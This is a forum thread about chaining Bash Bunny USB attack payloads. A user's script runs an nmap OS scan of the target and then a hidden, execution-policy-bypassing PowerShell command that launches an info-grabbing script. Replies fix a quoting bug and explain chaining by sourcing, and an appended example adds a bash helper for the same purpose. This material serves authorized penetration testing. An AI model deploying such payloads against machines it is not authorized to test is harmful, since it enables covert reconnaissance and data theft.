
Is it possible to chain payloads?


Am3ience


Hi guys, another question. Is it possible to chain payloads one after another? Basically what I want to do is use the Nmapper payload, then the InfoGrabber payload right after the scan. They both go off correctly when done by themselves, but when I try to copy and paste the Nmapper onto the InfoGrabber payload, nothing goes off. No LEDs or anything after the initial green. The code is below:

 

# See nmap --help for options. Default "-O --fuzzy" profiles target OS.
NMAP_OPTIONS="-O --fuzzy""
LOOTDIR=/root/udisk/loot/nmap

######## INITIALIZATION ########
LED SETUP
# Use RNDIS for Windows. Mac/Linux use ECM_ETHERNET
ATTACKMODE RNDIS_ETHERNET 
#ATTACKMODE ECM_ETHERNET
GET TARGET_IP
GET TARGET_HOSTNAME
GET SWITCH_POSITION

######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l)
COUNT=$((COUNT+1))

######## ERROR IF NO TARGET IP ########
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
    exit 1
fi

######## ATTACK ########
LED ATTACK
nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log

######################################################################################## Info Grab
ATTACKMODE HID STORAGE

LED SPECIAL
# Run the run.ps1 script in the BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"

######## CLEANUP ########
LED CLEANUP
sync

######## FINISH ########
LED FINISH

 


Hi there,

I didn't try your payload, but as the LED isn't turning on, I had a deeper look at the first lines of your code:

NMAP_OPTIONS="-O --fuzzy""

Delete one quote at the end of the line. Bash will hang there...


2 hours ago, GermanNoob said:

Hi there,

I didn't try your payload, but as the LED isn't turning on, I had a deeper look at the first lines of your code:


NMAP_OPTIONS="-O --fuzzy""

Delete one quote at the end of the line. Bash will hang there...

I love you, I can't believe I missed that.


Yes, it is definitely possible.

For example, you could simply source the shell script.

source /PATH/TO/PAYLOAD/payload.txt

Keep in mind that if you have something after it (as below), it will run that once the other payload is complete.

echo "Starting second payload.."
source /PATH/TO/PAYLOAD/payload.txt
echo "Second payload is complete!"

Which comes with all the other bits and bobs, like...

FIRST SCRIPT:
source secondscript.txt
echo "Hello $name"

SECOND SCRIPT:
name="Am3ience"

So you could check if the second script succeeded by checking for a variable. Some pretty interesting ideas and combinations you could do to make interesting payloads. :)

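An added example (not code from the thread, nor from Hak5's own payloads) of the chaining described in the answer above, combined with the lesson from the first reply: each payload file is parsed with bash -n before anything is sourced, so an unbalanced quote stops the chain with a message instead of hanging it. The PAYLOAD_STATUS variable, the file names and the temp directory are assumptions for a stand-alone run.

```bash
# Added example: chain payload files by sourcing them in order, so variables set by
# the first are visible to the second. PAYLOAD_STATUS="ok" is an assumed convention.

# Parse every file with bash -n before running anything, so a typo like the doubled
# closing quote found in the thread aborts the chain instead of hanging it.
check_payloads() {
    local f
    for f in "$@"; do
        if ! bash -n "$f" 2>/dev/null; then
            echo "syntax error in $f" >&2
            return 1
        fi
    done
}

# Source each payload in turn (. is the POSIX spelling of source) and stop at the
# first one that does not report success through PAYLOAD_STATUS.
chain_payloads() {
    local f
    check_payloads "$@" || return 1
    for f in "$@"; do
        PAYLOAD_STATUS=""
        . "$f"
        if [ "$PAYLOAD_STATUS" != "ok" ]; then
            echo "$f did not set PAYLOAD_STATUS=ok, chain stopped" >&2
            return 1
        fi
    done
    echo "all $# payloads completed"
}

# Constructed payload files for a stand-alone run (a temp dir, not /root/udisk).
make_demo_payloads() {
    DEMO_DIR=$(mktemp -d)
    cat > "$DEMO_DIR/first.txt" <<'EOF'
TARGET_HOSTNAME="demo-host"   # on the device this would come from GET TARGET_HOSTNAME
PAYLOAD_STATUS="ok"
EOF
    cat > "$DEMO_DIR/second.txt" <<'EOF'
echo "second payload sees host: $TARGET_HOSTNAME"   # set by first.txt, still visible
PAYLOAD_STATUS="ok"
EOF
    # Reproduces the bug GermanNoob spotted: one closing quote too many.
    printf 'NMAP_OPTIONS="-O --fuzzy""\n' > "$DEMO_DIR/broken.txt"
}

make_demo_payloads
chain_payloads "$DEMO_DIR/first.txt" "$DEMO_DIR/second.txt"
chain_payloads "$DEMO_DIR/broken.txt" "$DEMO_DIR/second.txt" || true   # stops at the syntax check
```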
